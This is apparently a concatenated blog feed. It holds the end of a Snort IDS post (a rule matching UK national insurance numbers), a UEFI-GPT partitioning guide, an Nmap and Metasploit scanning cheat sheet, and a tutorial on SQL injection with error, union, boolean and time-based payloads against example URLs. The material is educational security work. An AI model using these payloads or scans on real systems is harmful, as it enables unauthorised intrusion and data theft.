<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>alert ip any any -> any http (sid:1000003;msg"UK national insurance number found";pcre:"/([A-CEGHJ-PR-TW-Z][A-CEGHJ-NPR-TW-Z])(\s*[0-9]){6}([A-D]|\s)/i";)
</code></pre></div></div>
<h4 id="description-3">Description</h4>
<p>Alright, this one is a little more complicated and demonstrates the use of sets
in PCRE. It is based on the specifications of NIM391110 which may be found here:
<a href="http://www.hmrc.gov.uk/manuals/nimmanual/nim39110.htm">http://www.hmrc.gov.uk/manuals/nimmanual/nim39110.htm</a>:</p>
<ul>
<li>
<p><code class="highlighter-rouge">([A-CEGHJ-PR-TW-Z][A-CEGHJ-NPR-TW-Z])</code> : First capture group, this
searches for a two character pair. The first and second characters cannot be
D, F, I, Q, U, or V. The second character has the added restraint of not being
O.</p>
</li>
<li>
<p><code class="highlighter-rouge">(\s*[0-9]){6}</code> : Second capture group, searches for a number between 0
and 9, repeated 6 times, allowing for zero to multiple spacing (<code class="highlighter-rouge">\s*</code>). It
is important not to add a <code class="highlighter-rouge">\s*</code> at the end of this rule, because of the
next group constraint being either a space or a letter, multiple spaces after
could thus lead to errors in matching.</p>
</li>
<li>
<p><code class="highlighter-rouge">([A-D]|\s)</code> : A character between A and D or a space.</p>
</li>
<li>
<p><code class="highlighter-rouge">i</code> : Flag insensitive, allows for case insensitive matching (thus
capital or lowercase characters for matching)</p>
</li>
</ul>
<h2 id="references">References</h2>
<p>[1] S. T. /. O. S. Community, “What is Snort?,” Cisco Systems, [Online]. Available: https://snort.org/faq/what-is-snort.</p>
<p>[2] S. Team, “1.2 Sniffer Mode,” Cisco Systems, [Online]. Available: http://manual.snort.org/node4.html.</p>
<p>[3] S. Team, “1.3 Packet Logger Mode,” Cisco Systems, [Online]. Available: http://manual.snort.org/node5.html.</p>
<p>[4] S. Team, “1.4 Network Intrusion Detection System Mode,” Cisco Systems, [Online]. Available: http://manual.snort.org/node6.html.</p>
<p>[5] S. T. /. O. S. Community, “README.decode,” Cisco Systems, [Online]. Available: https://www.snort.org/faq/readme-decode.</p>
<p>[6] S. Team, “2.2.7 HTTP Inspect,” Cisco Systems, [Online]. Available: http://manual-snort-org.s3-website-us-east-1.amazonaws.com/node17.html#SECTION00327000000000000000.</p>
<p>[7] S. Team, “2.2.11 FTP/Telnet Preprocessor,” Cisco Systems, [Online]. Available: http://manual-snort-org.s3-website-us-east-1.amazonaws.com/node17.html#SECTION003211000000000000000.</p>
<p>[8] S. Team, “2.2.1 Frag3,” Cisco Systems, [Online]. Available: http://manual-snort-org.s3-website-us-east-1.amazonaws.com/node17.html#SECTION00321000000000000000.</p>
<p>[9] S. Team, “2.2.4 sfPortscan,” Cisco Systems, [Online]. Available: http://manual-snort-org.s3-website-us-east-1.amazonaws.com/node17.html#SECTION00324000000000000000.</p>
<p>[10] S. Team, “2.2.15 ARP Spoof Preprocessor,” Cisco Systems, [Online]. Available: http://manual-snort-org.s3-website-us-east-1.amazonaws.com/node17.html#SECTION003215000000000000000.</p>
<p>[11] R. U. Rehman, “Intrusion Detection,” in Intrusion Detection With SNORT, Apache, MySQL, PHP, And ACID: Advanced IDS Techniques Using SNORT, Apache, MySQL, PHP and ACID, Pearson Technology Group, 2007, p. 14.</p>
<p>[12] S. Team, “2.6 Output Modules,” Cisco Systems, [Online]. Available: http://manual-snort-org.s3-website-us-east-1.amazonaws.com/node21.html.</p>
<p>[13] S. Team, “3.4.4 sid,” Cisco Systems, [Online]. Available: http://manual.snort.org/node31.html#SECTION00444000000000000000.</p>
<p>[14] S. Team, “content,” Cisco Systems, [Online]. Available: http://manual.snort.org/node328.html.</p>Kevin Almansakevin.almansa@gmail.comThis post is an overview of the Snort IDS/IPS. Details are given about it's modes, components, and example rules.UEFI-GPT Partitioning2016-12-11T00:00:00+00:002016-12-11T00:00:00+00:00https://kevinalmansa.github.io/uefi/UEFI-GPT<p>When I was a teenager testing my system and installing new OSs I quickly learned
how to partition drives using the classic MBR scheme. As such, it took a bit of
research and trial & error to learn the new UEFI with GPT scheme. In this post
I focus on partitioning with UEFI-GPT, and do not delve into other aspects of
UEFI. This post is here to hopefully help those who got stuck as I did.</p>
<h2 id="classic-mbr-partitioning">Classic MBR Partitioning</h2>
<p>Classically, hard drives would follow what is known as an MBR partitioning
scheme, a Master Boot Record (MBR) stored in the first 512 Bytes of the storage
device containing the boot loader (the first 440 Bytes) and the partitioning
table.</p>
<p>Under a BIOS system, when booting, the BIOS will load the MBR into memory and
the bootloader will run. This is done because the BIOS can’t understand the
filesystems, thus the bootloader will be responsible for loading the operating
system(s) which reside on the disk partitions.</p>
<p>The <em>Primary</em> partition was the traditional type of partition, and the MBR
supported a maximum 4 of them. To counter this limitation, <em>Extended</em> partition
were introduced, allowing for 3 Primary and 1 Extended partition. Extended
partitions hold a potentially unlimited number of <em>Logical</em> partitions
(according to the standard) allowing us to bypass the limitation of 4 partitions
per disk.</p>
<p>As an example my Dual-Boot configuration, with Windows and Linux alongside,
would be the following:</p>
<table>
<thead>
<tr>
<th style="text-align: right">Partition Nbr</th>
<th style="text-align: right">Type</th>
<th style="text-align: right">Contents</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: right">1</td>
<td style="text-align: right">Primary</td>
<td style="text-align: right">Windows Reserved</td>
</tr>
<tr>
<td style="text-align: right">2</td>
<td style="text-align: right">Primary</td>
<td style="text-align: right">Windows</td>
</tr>
<tr>
<td style="text-align: right">3</td>
<td style="text-align: right">Extended</td>
<td style="text-align: right"> </td>
</tr>
<tr>
<td style="text-align: right">4</td>
<td style="text-align: right">Logical</td>
<td style="text-align: right">Linux Boot Partition</td>
</tr>
<tr>
<td style="text-align: right">5</td>
<td style="text-align: right">Logical</td>
<td style="text-align: right">Linux Swap Partition</td>
</tr>
<tr>
<td style="text-align: right">6</td>
<td style="text-align: right">Logical</td>
<td style="text-align: right">Linux Root Partition</td>
</tr>
</tbody>
</table>
<h2 id="uefi">UEFI</h2>
<p>UEFI is a new system which replaces the BIOS and it’s boot process. When the
computer turns on, after the POST, instead of having the BIOS initialize
hardware, the UEFI firmware is loaded and takes over this initialization.</p>
<p>So what’s different? In the next stage the firmware itself will read the boot
entries in its boot manager, which is located on a partition, since it is able
to read the file system.</p>
<p>UEFI typically (under Windows it is actually obliged to) uses a new partitioning
scheme: GUID Partition Table (GPT). Noticeable advantages of this scheme are</p>
<ul>
<li>Support for disks larger than 2 TB (a maximum of 2 ZB)</li>
<li>Uses a unique GUID for the disk and Partition GUID for the partitions (all
of which are filesystem independent)</li>
<li>Contains space for 128 partitions with the possibility of extending the
space for more</li>
</ul>
<p>With the noticeable advantages it provides, one must bare in mind that it is
new and works differently than MBR. The way you partition your drives now
changes slightly.</p>
<h2 id="uefi-partitioning">UEFI Partitioning</h2>
<p>UEFI-GPT requires that your first partition is a FAT 32 formatted partition
referred to as the <em>EFI System Partition (ESP)</em>. The UEFI firmware will launch
the UEFI bootloader and application from the ESP. This special partition can
hold multiple bootloader’s and applications, and is shared for each system on
the drive (if for example you are dual booting Windows and Linux).</p>
<p>If partitioning with fdisk or gdisk ensure this partition is of type
<em>EFI System</em> or <em>EF00</em></p>
<p>The rest of the partitions are up to you and your requirements.</p>
<p>For example, my partitioning for a UEFI-GPT Linux system is the following:</p>
<table>
<thead>
<tr>
<th style="text-align: right">Device</th>
<th style="text-align: right">Size</th>
<th style="text-align: right">Type</th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align: right">/dev/sda1</td>
<td style="text-align: right">512M</td>
<td style="text-align: right">EFI System Partition</td>
</tr>
<tr>
<td style="text-align: right">/dev/sda2</td>
<td style="text-align: right">2G</td>
<td style="text-align: right">Linux Swap Partition</td>
</tr>
<tr>
<td style="text-align: right">/dev/sda3</td>
<td style="text-align: right">17.5G</td>
<td style="text-align: right">Linux Root Partition</td>
</tr>
</tbody>
</table>
<p>Concerning Bootloaders, I personally use <em>Systemd-boot</em> as it is part of
systemd (already installed on my distribution) and I find it is easier than GRUB
for UEFI-GPT. As such the ESP is mounted to /boot and contains the kernel and
initramfs files. Systemd-boot auto-detects the Windows Loader and adds an option
for it, although the Linux systems need manual entries, but this is simple to do
(refer to my arch install post).</p>Kevin Almansakevin.almansa@gmail.comThis post covers the basics of UEFI and GPT for disk partitioning.Nmap Commands2016-12-08T00:00:00+00:002016-12-08T00:00:00+00:00https://kevinalmansa.github.io/intelligence%20gathering/Nmap-Commands<p>This post covers basic Nmap commands for Intelligence Gathering using active
techniques and passive techniques in conjunction with Metasploit.</p>
<p>Basic arguments such as OS Detection, Port Ranges, etc. are ommited.</p>
<h2 id="network-discovery">Network Discovery</h2>
<h3 id="simple-list">Simple List</h3>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap -sL 192.168.56.0/24
</code></pre></div></div>
<h3 id="ping-scan">Ping Scan</h3>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap -sn 192.168.56.0/24
</code></pre></div></div>
<h2 id="port-scan">Port Scan</h2>
<h3 id="basic-port-scan">Basic Port Scan</h3>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap 192.168.56.101
</code></pre></div></div>
<h3 id="banner-grabbing-version-scan">Banner Grabbing Version Scan</h3>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap -sV 192.168.56.101
</code></pre></div></div>
<h3 id="aggressive-runs-default-scripts-too">Aggressive (runs default scripts too)</h3>
<p><em>will set off IDS/IPS</em></p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap -A 192.168.56.101
</code></pre></div></div>
<h3 id="dont-ping-to-determine-if-alive">Dont ping to determine if alive</h3>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap -sP 192.168.56.101
</code></pre></div></div>
<h3 id="syn-scan">Syn Scan</h3>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap -sS 192.168.56.101
</code></pre></div></div>
<h3 id="idle-scanning">Idle Scanning</h3>
<p>If we can predict the IP ID of an idle host, we can use it as a zombie.
Idle Incremental IP ID Discovery:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>msfconsole> use auxiliary/scanner/ip/ipidseq
msfconsole> show options
</code></pre></div></div>
<p>Set RHOSTS and THREADS
When you found an Incremental host, use it with nmap:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap -PN -sI <ip of found host> 190.168.56.101
</code></pre></div></div>
<h2 id="scripts">Scripts</h2>
<h3 id="locate-scripts">Locate scripts</h3>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>ls /usr/share/nmap/scripts/
</code></pre></div></div>
<h3 id="update-script-database">Update Script Database</h3>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap --script-updatedb
</code></pre></div></div>
<h3 id="run-default-scripts">Run Default Scripts</h3>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap -sC 192.168.56.101 -p <port>
</code></pre></div></div>
<h3 id="script-information">Script Information</h3>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap --script-help=<script name>
</code></pre></div></div>
<h3 id="specific-script">Specific script</h3>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nmap --script=<script name> -p <port>
</code></pre></div></div>Kevin Almansakevin.almansa@gmail.comThis post covers basic Nmap commands for Intelligence Gathering using active and passive techniques.SQL Injection2016-12-06T00:00:00+00:002016-12-06T00:00:00+00:00https://kevinalmansa.github.io/sql%20injection/SQL-Injection<h2 id="what-is-a-sql">What is a SQL</h2>
<p>Structured Query Language (SQL) is a language used to interact with
relational database management systems (RDBMS) such as MySQL, PostgreSQL, Oracle
SQL, etc. Through this language programmers and administrators are able to
administer databases as well as modify their data. Data can be selected,
updated, inserted or deleted based on conditions through SQL.</p>
<p>Applications often rely on information given by a user when creating a query.
This information can be a product id given in a link, a product category, or
input for a search bar.</p>
<p>This information will be incorporated into the query sent to the database so
that the appropriate information may be retrieved and returned to the
application, which will then decide how to present it (product page, tables,
etc.).</p>
<h2 id="what-is-sql-injection-sqli">What is SQL Injection (SQLi)</h2>
<p>There is a rule in Security; never trust user input. This rule is often
neglected or simply unknown, and is thus the root of many attacks. SQL Injection
is one such attack.</p>
<p>SQL Injection occurs when the user input is not properly sanitized before being
incorporated into a query. This allows the attacker to hijack control of the SQL
command sent to the database, allowing them to execute arbitrary commands.</p>
<p>Databases can contain user information, banking, product information (such as
their prices) amongst other things. When an attacker controls the
queries sent to a database they can potentially retrieve and or modify this
information.</p>
<p>There are three categories of SQLi, as explained by Joseph McCray:</p>
<ul>
<li>
<p><strong>Inband</strong>: The most straightforward kind of attack; data is retrieved in the
same channel that is used to inject the SQL code.
<a href="https://www.youtube.com/watch?v=rdyQoUNeXSg">[1]</a>.</p>
</li>
<li>
<p><strong>Inferential</strong>: There is no actual transfer of data, but the tester is able to
reconstruct the information by sending particular requests and observing the
resulting behavior. <a href="https://www.youtube.com/watch?v=rdyQoUNeXSg">[1]</a>
This attack is often called a Blind SQL Injection.</p>
</li>
<li>
<p><strong>Out-of-band</strong>: Data is retrieved using a different channel (e.g.: email)
<a href="https://www.youtube.com/watch?v=rdyQoUNeXSg">[1]</a></p>
</li>
</ul>
<p>These classes can then be broken down into various types of SQLi attacks,
based on the configuration of the server and the behavior of the application.
Roughly:</p>
<ul>
<li>
<p><strong>Error Based Attack</strong>: An Inband technique relying on error messages for the
attacker to understand their target.</p>
</li>
<li>
<p><strong>Union Based Attack</strong>: An Inband technique relying on an SQL keyword to
combine multiple queries into one response.</p>
</li>
<li>
<p><strong>Boolean Based Attack</strong>: An Inferential technique relying on the application
behaving differently based on a boolean (TRUE or FALSE) query sent.</p>
</li>
<li>
<p><strong>Time Based Attack</strong>: Similar to a Boolean Based Attack. We ask the
database to wait a given amount of time before returning the results if TRUE.
What this means is if we send our information (example through a search bar) and
it takes longer for the application to respond, for example 10 seconds if we
asked the database to wait 10 seconds, we know the condition is true.</p>
</li>
</ul>
<p>More detail will be given later on these attacks. If you can, watch the
conference given by Joseph McCray at Defcon 17
<a href="https://www.youtube.com/watch?v=rdyQoUNeXSg">[1]</a>. It is hands down one of the
best SQL Injection videos I have seen (and most entertaining as well).</p>
<h2 id="the-basics">The Basics</h2>
<p>Let’s ignore the kinds of SQL injection for a few minutes and understand what
is actually going on.</p>
<p>Let’s imagine a web application that displays, once you are logged in, your
email address. To retrieve your email address based on a username, we would
imagine a simple query as such:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SELECT email FROM people WHERE username LIKE ' + input + ' AND is_active = TRUE
</code></pre></div></div>
<p>This is asking the database for your email, which is stored in a database table
named <em>people</em> with a constraint that the account must be active (and not, for
example, banned).</p>
<p>To simplify things, let’s imagine the username is provided in the URL. It would
look something like this:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://www.vulnerableapp.example/account?user=kevo
</code></pre></div></div>
<p>As expected a username is provided, in this case <em>kevo</em>. Now this is how the
developer wants the users to use the application, perhaps this link is in a
button or clickable image. Cool.</p>
<p>Now what happens if I manually enter the following URL?</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://www.vulnerableapp.example/account?user=' or 'a' LIKE 'a
</code></pre></div></div>
<p>The query becomes:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SELECT email FROM people WHERE username LIKE '' OR 'a' LIKE 'a' AND is_active = TRUE
</code></pre></div></div>
<p>The SQL condition is valid, and effectively becomes:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SELECT email FROM people WHERE is_active = TRUE
</code></pre></div></div>
<p>The only thing limiting which emails should be provided is the
<em>is_active = TRUE</em>. This will return all active account emails.</p>
<p>Now what happens if I want everyone’s email? Don’t judge me, I’m greedy.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://www.vulnerableapp.example/account?user=' or 'a' LIKE 'a'--
</code></pre></div></div>
<p>The query becomes:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SELECT password FROM people WHERE username LIKE '' or 'a' LIKE 'a'-- AND is_active = TRUE
</code></pre></div></div>
<p>Note the SQL comment delimiter <strong>–</strong>. This thus commented out the condition for
only active accounts. This query will now return everyone’s email.</p>
<p>Now this example is obviously vulnerable and has more issues than just SQLi, but
it is simple enough that we can focus on the concept of SQLi. A more realistic
scenario would be using a Session Id (SID) passed through an HTTP Cookie, but
the attack remains the same. I can still modify that Cookie, replacing the SID
with SQL code, fulfilling my injection. In fact, aside from URLs and Cookies,
attacks can originate from any source of input that is coming from the client.</p>
<p>This is the essence of SQL Injection. Hijack the application’s query to execute
your arbitrary commands. The issue is, we don’t always have the query in front
of us nor do we usually know the structure of the database. This is where attack
techniques come into play.</p>
<h2 id="types-of-attacks">Types of attacks</h2>
<h3 id="error-based-attack">Error Based Attack</h3>
<h4 id="category">Category</h4>
<p>Inband technique</p>
<h4 id="description">Description</h4>
<p>Error Based Attacks rely on error messages displayed by the server or
application to obtain information on the structure of the SQL query itself, the
database, and or the table.</p>
<p>These error messages are often used in the development of the application allowing
developers to quickly understand and debug their errors. It also simplifies an
attacker’s goal of understanding the database.</p>
<h4 id="example">Example</h4>
<p>Let’s assume we’re getting product details from an online store. The typical URL
may look something like this:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://www.vulnerableapp.example/product?id=42
</code></pre></div></div>
<p>When we try one of the most basic forms of testing for SQL Injection, adding
a quotation mark:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://www.vulnerableapp.example/product?id=42'
</code></pre></div></div>
<p>We can see the injection attempt provides the following error:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Unclosed quotation mark after the character string ".
</code></pre></div></div>
<p>While this is useful in debugging our own SQL Injections, it can be taken one
step further and be used for SQL Enumeration, something I will cover in a later
post. For example, imagine the following query executed by a MSSQL Server:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://www.vulnerableapp.example/product?id=42 or 1 in (SELECT user)--
</code></pre></div></div>
<p>The error message will be something like:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Conversion failed when converting the nvarchar value 'admin' to data type int.
</code></pre></div></div>
<p>The error message reveals our queries are being executed as user ‘admin’.</p>
<p>As we can see, these error messages can clearly indicate column types, names or
configurations, simplifying the actual injection attempt as it is informing you
that you can inject, but even more so, it is holding your hand and telling you
what is wrong with the query or outputting database information directly.</p>
<h3 id="union-based-attack">Union Based Attack</h3>
<h4 id="category-1">Category</h4>
<p>Inband technique</p>
<h4 id="description-1">Description</h4>
<p>Union Based Attacks use the SQL keyword <em>UNION</em> to combine multiple SQL query
results into one response.</p>
<p>This will not have it’s own error page but rather, the output will be seen in
the application. It could, for example, be used to build the page, a table in
the page, etc.</p>
<h4 id="example-1">Example</h4>
<p>Imagine the application has a table filled with database information which
it outputs. For example a table of products with their name and price such as:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://www.vulnerableapp.example/product?product=home
</code></pre></div></div>
<table>
<thead>
<tr>
<th>Name</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>table</td>
<td>20£</td>
</tr>
<tr>
<td>lamp</td>
<td>8£</td>
</tr>
</tbody>
</table>
<p>A union based attack would try and inject another select statement, here
retrieving what is obviously 2 columns, filled with more useful information
such as the database version:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://www.vulnerableapp.example/product?product=home' UNION ALL SELECT @@version, '1'--
</code></pre></div></div>
<p>Resulting in:</p>
<table>
<thead>
<tr>
<th>Name</th>
<th>Value</th>
</tr>
</thead>
<tbody>
<tr>
<td>table</td>
<td>20£</td>
</tr>
<tr>
<td>lamp</td>
<td>8£</td>
</tr>
<tr>
<td>5.5.41-MariaDB</td>
<td>1</td>
</tr>
</tbody>
</table>
<p>The difficulty here is if the data types are not correct, it could result in an
empty table (the server had an error). To get around this you can use <em>null</em>
instead of a string or int value for extra columns.</p>
<h3 id="boolean-based-attack">Boolean Based Attack</h3>
<h4 id="category-2">Category</h4>
<p>Inferential technique</p>
<h4 id="description-2">Description</h4>
<p>Perhaps the SQL data is not revealed directly, but the application behaves
differently whether the SQL result is <em>TRUE</em> or <em>FALSE</em>. An example would be
that maybe the application returns a HTTP 404 or redirects to the home page if
the query is FALSE. Maybe just a custom error message which reveals no relevant
information.</p>
<p>Through this, we can see if a query is TRUE or FALSE, and by asking specific
questions such as <em>Is the user running the query as admin</em> or <em>is the database
version greater than x</em> we can enumerate the database.</p>
<p>As you can imagine this is relatively slow and tedious and could require many
queries to obtain database or table names.</p>
<h4 id="example-2">Example</h4>
<p>As demonstrated by OWASP
<a href="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)#Boolean_Exploitation_Technique">[2]</a>
let’s suppose the URL is:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://www.example.com/index.php?id=1
</code></pre></div></div>
<p>and the executed query is:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>SELECT field1, field2, field3 FROM Users WHERE Id='$Id'
</code></pre></div></div>
<p>This can be easily exploited by adding a single quote, as we previously saw in
the section <a href="##The-Basics">The Basics</a>.</p>
<p>Let’s assume we want to retrieve the username for the account executing the
queries on the database, and let’s assume it can be retrieved using the keyword
<em>username</em>.</p>
<p>We have three SQL functions that interest us:</p>
<ul>
<li>SUBSTRING(text, start length): retrieve <em>length</em> characters starting from the
<em>start</em> position of text <em>text</em>. Returns null otherwise.</li>
<li>ASCII(char): returns the ascii numerical value of the character <em>char</em></li>
</ul>
<p>With these two functions we can start asking questions by appending it to the
WHERE, for example:</p>
<p>is the first character of the username an ‘a’ (ASCII 97):</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://www.example.com/index.php?id=1' AND ASCII(SUBSTRING(username,1,1))=97 AND 'a'='a
</code></pre></div></div>
<p>If the application behaved <em>normally</em> we know the first character of the
username is ‘a’.</p>
<p>Using this technique we can enumerate over each character to eventually form
the username. As you can imagine, this requires a sizeable number of queries.</p>
<h3 id="time-based-attack">Time Based Attack</h3>
<h4 id="category-3">Category</h4>
<p>Inferential technique</p>
<h4 id="description-3">Description</h4>
<p>For a boolean based attack the application behaves differently. Now what happens
if none of that is the case? We find SQL Injection is possible, but the
application does not behave any differently nor does it display anything? Well,
we can make it behave differently.</p>
<p>This attack will ask the database to wait a certain amount of time if the query
is TRUE. Thus, the webpage will take longer to load as it waits for the response
from the database.</p>
<p>The period to wait must be long enough to ensure the time difference can not be
the cause of a slow network or high database load. As you can imagine if
thousands of queries need to be sent, this will take a significant amount of time.</p>
<h4 id="example-3">Example</h4>
<p>Let’s take the Boolean example, but assume that there is no way of inferring a
difference (error message or change in application response).</p>
<p>We have the vulnerable URL:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://www.example.com/index.php?id=1
</code></pre></div></div>
<p>We will assume the database is a MySQL 5.X.</p>
<p>We will use the same functions as in the boolean based attack, but add the
following:</p>
<ul>
<li>IF(condition, true_state, false_state): if the condition in <em>condition</em> is
TRUE, run the statement <em>true_state</em> else run the statement <em>false_state</em></li>
<li>sleep(sec): Pause execution for <em>sec</em> seconds.</li>
</ul>
<p>Our new injection will then be the following:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://www.example.com/index.php?id=1' AND IF(ASCII(SUBSTRING(username,1,1))=97, sleep(10), 'false')--
</code></pre></div></div>
<h3 id="tips">Tips</h3>
<h4 id="testing-for-sql-injection">Testing for SQL Injection</h4>
<p>Imagine you have the following:</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://www.vulnerableapp.example/product?id=42
</code></pre></div></div>
<p>An effective means of testing for SQL injection, whether or not inferential
methods are later required for exploitation, would simply be testing if an
arithmetic expression is evaluated.</p>
<div class="highlighter-rouge"><div class="highlight"><pre class="highlight"><code>http://www.vulnerableapp.example/product?id=(41+1)
</code></pre></div></div>
<p>If the same product page is shown (that of id=42), congratulations, SQL
Injection is possible.</p>
<p>This is demonstrated by Joseph McCray in
<a href="https://www.youtube.com/watch?v=rdyQoUNeXSg">[1]</a>.</p>
<h3 id="cheat-sheet">Cheat Sheet</h3>
<p>While SQL is a standardized language, databases handle data types and database
specific commands (such as retrieving the version, users, passwords, etc.)
differently. As such proper references, aka cheat sheets, are invaluable.</p>
<p>The best I’ve seen on the net come from Pentest Monkey
<a href="http://pentestmonkey.net/cheat-sheet/sql-injection">[3]</a> who provides cheat
sheets for a variety of databases including MySQL, PostgreSQL, MSSQL, etc.</p>
<h3 id="tools">Tools</h3>
<p>Tools that automate SQL Injection are tricky. While they may support many kinds
of RDBMS and injection locations (URL, HTTP Header, Cookies, etc) they can be
loud and they can be spotted by an IDS/IPS with relative ease. They also aren’t
100% effective, sometimes making manual injection necessary.</p>
<p>Take these for what they are. They are tools that should be used as a support
when applicable. Ensure you know how they work, when to use them, and what
can go wrong. Try not to be dependent on them.</p>
<ul>
<li>SQLMap <a href="https://github.com/sqlmapproject/sqlmap">[4]</a></li>
<li>SQLNinja <a href="http://sqlninja.sourceforge.net/">[5]</a></li>
<li>BSQL <a href="https://labs.portcullis.co.uk/tools/bsql-hacker/">[6]</a></li>
<li>TheMole <a href="https://sourceforge.net/projects/themole/">[7]</a></li>
</ul>
<h2 id="references">References</h2>
<ol>
<li>DEFCON 17 - Joseph McCray - Advanced SQL Injection - <a href="https://www.youtube.com/watch?v=rdyQoUNeXSg">https://www.youtube.com/watch?v=rdyQoUNeXSg</a></li>
<li>OWASP Testing for SQL Injection - <a href="https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)#Boolean_Exploitation_Technique">https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005)#Boolean_Exploitation_Technique</a></li>
<li>pentestmonkey Cheatsheets - <a href="http://pentestmonkey.net/cheat-sheet/sql-injection">http://pentestmonkey.net/cheat-sheet/sql-injection</a></li>
<li>SQLMap - <a href="https://github.com/sqlmapproject/sqlmap">https://github.com/sqlmapproject/sqlmap</a></li>
<li>SQLNinja - <a href="http://sqlninja.sourceforge.net/">http://sqlninja.sourceforge.net/</a></li>
<li>BSQL - <a href="https://labs.portcullis.co.uk/tools/bsql-hacker/">https://labs.portcullis.co.uk/tools/bsql-hacker/</a></li>
<li>TheMole - <a href="https://sourceforge.net/projects/themole/">https://sourceforge.net/projects/themole/</a></li>
</ol>Kevin Almansakevin.almansa@gmail.comIn this post we cover the three categories of SQL Injection and detail and provide examples for four types of SQLi attacks.